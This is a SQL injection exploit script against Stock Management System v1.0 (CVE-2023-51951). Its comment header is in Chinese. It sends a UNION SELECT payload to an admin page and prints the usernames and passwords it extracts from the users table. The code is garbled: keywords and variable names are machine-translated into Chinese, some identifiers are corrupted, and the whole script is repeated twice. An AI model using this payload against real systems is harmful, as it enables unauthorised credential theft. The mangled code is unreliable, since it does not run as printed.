#利用标题:股票管理系统v1.0-未经验证的SQL注入
#DATE: 2024年2月6日
#利用作者:JosuéMier(又名Blu3ming)安全研究人员渗透测试人员@Wizlynx Group
#供应商homepage3360 https://www.sourcecodester.com/php/...-system-system-phpoop-source-source-code.html
#软件link: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/sms.zip
#在: Linux和Windows上测试,XAMPP
#CVE-2023-51951
#vendor: oretnom23
#版本: V1.0
#利用描述:
#Web应用程序库存管理系统受影响1.0版的未经验证的SQL注入的影响,允许远程攻击者使用基于错误的注射攻击来倾倒SQL数据库。
导入请求
来自BS4进口美丽的小组
导入argparse
def print_header():
print('\ 033 [1M \ nstock管理系统V1.0 \ 033 [0M')
打印('\ 033 [1MSQL注入exploit \ 033 [0m')
print('\ 033 [96mby blu3ming \ n \ 033 [0m')
def parse_response(target_url):
TRY:
target_response=requests.get(target_url)
汤=beautifulsoup(target_response.text,'html.parser')
textarea_text=soup.find('textarea',{'name':'备注','id':'备注'})。
#使用','作为定界符拆分文本
用户=textarea_text.split(',')
对于用户中的用户:
#使用':'作为定界符拆分用户名和密码
用户名,密码=user.split(':')
print('| {:20} | {:40} |'.format(用户名,密码))
Except:
打印(“无法检索数据。再试一次。”)
DEF RETRIEVE_DATA(base_url):
target_path='/sms/admin/?page=puppy_order/manage_poid='
有效载荷=''+Union+选择+1,2,3,4,5,6,7,8,group_concat(用户名,0x3a,密码),10,11,12,13++用户- + - '
#Dump用户表
target_url=base_url + target_path +有效载荷
打印('+-------------------------+---------------------------------------------------------------------+')
print('| {:20} | {:40} |'.format('用户名','password'))
打印('+-------------------------+---------------------------------------------------------------------+')
parse_response(target_url)
打印('+-------------------------+-------------------------------------------------------------------------+\ n')
如果name=='__ -Main __':
大约='未经身份验证的SQL注入利用- 股票管理系统'
Parser=argparse.argumentparser(description=about)
parser.add_argument(' - url',dest='base_url',必需=true,help='库存管理系统url')
args=parser.parse_args()
print_header()
retireve_data(args.base_url)
#DATE: 2024年2月6日
#利用作者:JosuéMier(又名Blu3ming)安全研究人员渗透测试人员@Wizlynx Group
#供应商homepage3360 https://www.sourcecodester.com/php/...-system-system-phpoop-source-source-code.html
#软件link: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/sms.zip
#在: Linux和Windows上测试,XAMPP
#CVE-2023-51951
#vendor: oretnom23
#版本: V1.0
#利用描述:
#Web应用程序库存管理系统受影响1.0版的未经验证的SQL注入的影响,允许远程攻击者使用基于错误的注射攻击来倾倒SQL数据库。
导入请求
来自BS4进口美丽的小组
导入argparse
def print_header():
print('\ 033 [1M \ nstock管理系统V1.0 \ 033 [0M')
打印('\ 033 [1MSQL注入exploit \ 033 [0m')
print('\ 033 [96mby blu3ming \ n \ 033 [0m')
def parse_response(target_url):
TRY:
target_response=requests.get(target_url)
汤=beautifulsoup(target_response.text,'html.parser')
textarea_text=soup.find('textarea',{'name':'备注','id':'备注'})。
#使用','作为定界符拆分文本
用户=textarea_text.split(',')
对于用户中的用户:
#使用':'作为定界符拆分用户名和密码
用户名,密码=user.split(':')
print('| {:20} | {:40} |'.format(用户名,密码))
Except:
打印(“无法检索数据。再试一次。”)
DEF RETRIEVE_DATA(base_url):
target_path='/sms/admin/?page=puppy_order/manage_poid='
有效载荷=''+Union+选择+1,2,3,4,5,6,7,8,group_concat(用户名,0x3a,密码),10,11,12,13++用户- + - '
#Dump用户表
target_url=base_url + target_path +有效载荷
打印('+-------------------------+---------------------------------------------------------------------+')
print('| {:20} | {:40} |'.format('用户名','password'))
打印('+-------------------------+---------------------------------------------------------------------+')
parse_response(target_url)
打印('+-------------------------+-------------------------------------------------------------------------+\ n')
如果name=='__ -Main __':
大约='未经身份验证的SQL注入利用- 股票管理系统'
Parser=argparse.argumentparser(description=about)
parser.add_argument(' - url',dest='base_url',必需=true,help='库存管理系统url')
args=parser.parse_args()
print_header()
retireve_data(args.base_url)